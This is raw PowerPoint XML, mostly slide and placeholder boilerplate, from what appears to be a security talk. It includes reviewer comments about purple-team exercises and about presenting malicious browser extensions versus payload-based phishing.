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notesSlides/notesSlide1.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58" r:id="rId4"/>
    <p:sldId id="367" r:id="rId5"/>
    <p:sldId id="368" r:id="rId6"/>
    <p:sldId id="369" r:id="rId7"/>
    <p:sldId id="370" r:id="rId8"/>
    <p:sldId id="343" r:id="rId9"/>
    <p:sldId id="371" r:id="rId10"/>
    <p:sldId id="303" r:id="rId11"/>
    <p:sldId id="344" r:id="rId12"/>
    <p:sldId id="302" r:id="rId13"/>
    <p:sldId id="345" r:id="rId14"/>
    <p:sldId id="363" r:id="rId15"/>
    <p:sldId id="350" r:id="rId16"/>
    <p:sldId id="351" r:id="rId17"/>
    <p:sldId id="352" r:id="rId18"/>
    <p:sldId id="353" r:id="rId19"/>
    <p:sldId id="354" r:id="rId20"/>
    <p:sldId id="355" r:id="rId21"/>
    <p:sldId id="340" r:id="rId22"/>
    <p:sldId id="356" r:id="rId23"/>
    <p:sldId id="336" r:id="rId24"/>
    <p:sldId id="357" r:id="rId25"/>
    <p:sldId id="358" r:id="rId26"/>
    <p:sldId id="361" r:id="rId27"/>
    <p:sldId id="362" r:id="rId28"/>
    <p:sldId id="372" r:id="rId29"/>
    <p:sldId id="366" r:id="rId30"/>
    <p:sldId id="36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dric Owens" initials="CO" lastIdx="2" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S::cedric.owens@creditkarma.com::91477a57-c8cf-4001-8d70-f2c0062fd524" providerId="AD"/>
      </p:ext>
    </p:extLst>
  </p:cmAuthor>
  <p:cmAuthor id="2" name="Cheerio xoxoxo" initials="Cx" lastIdx="4" clrIdx="1">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="c190d0f49e5b22f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1493"/>
    <a:srgbClr val="4EEBFF"/>
    <a:srgbClr val="00DCE9"/>
    <a:srgbClr val="EF40ED"/>
    <a:srgbClr val="310944"/>
    <a:srgbClr val="3D0C55"/>
    <a:srgbClr val="4607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86463" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="110" d="100"/>
          <a:sy n="110" d="100"/>
        </p:scale>
        <p:origin x="117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5-05T10:46:37.631" idx="4">
    <p:pos x="10" y="10"/>
    <p:text>great preso and content! Love all the resources! I don't know if you touch on this during the talk but talk about how the purple team exercises are set up/operationalized. ex: does blue know red's TTPs prior to the purple engagement? Is the purple exercise used to test blue team capabilities? OR is the purple exercise used to train blue team....everyone on the team OR both? if both, how is that set up? How are the detections/ improvements made? Does blue work with red per TTP in real-time and detect in logs/test controls OR other? etc. How are the results reported up to senior management? basically 1. how are the purple team exercises set up to identify gaps. 2. how do the purple team exercises improve the security posture of the organization. 3. how are the detection/mitigation strategies implemented (is it a risk registry that people eventually get to? is it prioritized per operation? Does red/blue work together to remediate before moving on to other purple activities? etc happy to chat about this if you would like.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05-05T10:30:17.967" idx="2">
    <p:pos x="10" y="10"/>
    <p:text>is gapps a typo?( i assume you mean apps?</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6-15T14:12:49.913" idx="1">
    <p:pos x="10" y="10"/>
    <p:text>Can also lay out the path of using a malicious browser extension</p:text>
    <p:extLst>
      <p:ext uri="{C676402C-5697-4E1C-873F-D02D1690AC5C}">
        <p15:threadingInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" timeZoneBias="300"/>
      </p:ext>
    </p:extLst>
  </p:cm>
  <p:cm authorId="2" dt="2021-05-05T10:36:19.224" idx="3">
    <p:pos x="10" y="106"/>
    <p:text>I'd make a general comment on how you can show the path of a malicious browser extension but (wink wink) enterprises manage browser extensions right?!? (protip or other catch phrase you want to use....would recommend working with org to ensure only corp allowed browser extensions can be installed). focusing on a broader attack scope of payload based phishing (ie applies to EVERYONE in the audience instead of just the people that dont manage their browser extensions) =)</p:text>
    <p:extLst>
      <p:ext uri="{C676402C-5697-4E1C-873F-D02D1690AC5C}">
        <p15:threadingInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" timeZoneBias="300">
          <p15:parentCm authorId="1" idx="1"/>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E8BABD-F6C6-904D-9487-A5FAF294D4E7}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/18/21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DA711D-CC69-6244-B4EE-36886C94654E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2437478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DA711D-CC69-6244-B4EE-36886C94654E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="904028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7BDC-9A25-764B-A589-C88F12E964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B954FA-34A7-F548-9F85-4618A7BF2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D7D25B-3FE9-BD4C-BB1B-9831D1DB4255}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2E2656B0-3E2E-124F-8F75-725AFC5C50DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/18/21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B81E0FA-A941-994C-8CE1-3A6CA1CA2F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3CE9CE-210A-D94C-B1C1-F15FC848B03D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A96DDBA0-F263-A94B-8540-503FD4268C99}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="377345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B3F7-286A-334F-A1DD-2BCAF1387E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0FA6F9-12A1-324C-9B37-472A97F105F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D212C6-2A6D-1142-8362-10D5B38718FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2E2656B0-3E2E-124F-8F75-725AFC5C50DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/18/21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18AAED9B-946B-7645-BE60-2B6958FF66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CFA680-92A2-B641-B09C-3522A8852DCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A96DDBA0-F263-A94B-8540-503FD4268C99}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1835620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5EDA34-D70F-B448-8943-8C69524CC2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6B7D5C-14B5-D043-9106-A77393A0746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C36375-9FDE-DD46-8B25-8A663AF37FB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2E2656B0-3E2E-124F-8F75-725AFC5C50DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/18/21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1128B39-A922-C941-86AB-193CDE8FB7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44E233-2FB0-2F4E-8F41-E018EC31C2F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A96DDBA0-F263-A94B-8540-503FD4268C99}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296640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85B65-84B0-624B-AA8D-3581504C22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D277DA-773C-BB44-A207-2715C41D2E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8C7695-10E0-024E-AAC6-8516E7133084}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2E2656B0-3E2E-124F-8F75-725AFC5C50DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/18/21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44647341-2A86-A645-A872-DD4F805429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396C17-D5B1-2642-A605-F6685F7C79D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A96DDBA0-F263-A94B-8540-503FD4268C99}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196258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2F3A-6776-5E4D-ADCA-8FF0731583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B92B68-2D9F-B64A-B65A-5776059A76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D120827-1690-1F44-95B3-5C6967D42863}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2E2656B0-3E2E-124F-8F75-725AFC5C50DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/18/21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EB7CA19-4F7F-D14F-A4AB-6293BBB6C1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FC47B-3249-C249-9814-D16CCB97257C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A96DDBA0-F263-A94B-8540-503FD4268C99}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2300289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642B-DF9C-3B45-AFB9-8C6542F0C3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6CE499-5169-2043-890A-B148B821B3B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8E9C75-F2F9-3E48-A57B-5943D25EDFE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55D6B1-A489-AB40-B720-95FD92C9061C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2E2656B0-3E2E-124F-8F75-725AFC5C50DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/18/21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD8FBEFD-7483-FD4E-AEEF-68138D7DBA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113348-9F30-6E4B-8AC6-C223C18D8FA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A96DDBA0-F263-A94B-8540-503FD4268C99}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356023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A1E49-DBB9-414B-A8F2-1F9638E94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02D0B7-952A-C34C-936E-DBAC81ACB3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EE0BA09-C84D-6A4A-821A-70C624D6FD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C958A2-3AC7-114E-A635-558804ADD7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BDC78D-DF71-3649-9C35-CFE870E53D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C5C7CC-684F-274F-98A4-A53EAA979C50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2E2656B0-3E2E-124F-8F75-725AFC5C50DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/18/21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{156E288B-A5D9-2D42-8113-34D0AB22EE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1ED627-F3F3-C74B-968B-E22807BE2578}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A96DDBA0-F263-A94B-8540-503FD4268C99}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4288785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0DC7-C12F-F24F-9424-72FD6986B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C0F9AD-094B-2347-8397-05BCB0A253AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2E2656B0-3E2E-124F-8F75-725AFC5C50DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/18/21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1721DFD7-7241-554B-858F-5C9FD91F29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A90F0F-2609-1840-BF36-557A4ED4B9E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A96DDBA0-F263-A94B-8540-503FD4268C99}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3140187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34BA5B-B192-764E-B9BD-B59799B229AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2E2656B0-3E2E-124F-8F75-725AFC5C50DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/18/21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5CF56F1-3D2A-5C48-A7BC-DD79980F98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AE549F-13CE-EE46-856D-D242BD4083D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A96DDBA0-F263-A94B-8540-503FD4268C99}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="980947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F5289-65B0-7D4D-A450-EA4635C419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30E307-B8AF-F64C-A68C-2F53DA0E96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DFCA58-6EA2-244D-9A9C-D92C483321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1F856F-870E-9C41-A6B7-A6EE59B029ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2E2656B0-3E2E-124F-8F75-725AFC5C50DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/18/21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{429940CE-0DC0-254E-8B06-CC88B00BA4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F3A959-C5B4-1D4D-B66E-FFEA6511C118}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A96DDBA0-F263-A94B-8540-503FD4268C99}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3757121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1B7F4-7EB8-4A45-86C8-5D24AD51E2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21C170-9881-5644-9024-2AB9D35BC6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19F6A0-81C9-3D46-93C5-FD35DD1535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48EB06-4C29-004F-B6A3-0339C03B1354}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2E2656B0-3E2E-124F-8F75-725AFC5C50DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/18/21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D2F147A-73E5-5745-9B6E-F3418C9ACA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DB5719-6E3B-2346-9824-8654E7467DCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A96DDBA0-F263-A94B-8540-503FD4268C99}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="385996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82D1A5-9C12-104C-AF88-1743ED3EF6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160CD9-22FA-8B40-9CA8-D4C28838A7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656089-01A8-F743-9A47-B56F4A0BDB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2656B0-3E2E-124F-8F75-725AFC5C50DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/18/21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FF50211-E4DE-9743-841A-505F947091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B28371-BB2C-DE4A-AF82-196F4645A7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6DDBA0-F263-A94B-8540-503FD4268C99}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35268440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5.jpe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image" Target="../media/image36.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId9"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tiff"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><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comments" Target="../comments/comment3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.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image" Target="../media/image40.jpe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OJ/gobuster" TargetMode="External"/><Relationship Id="rId3" 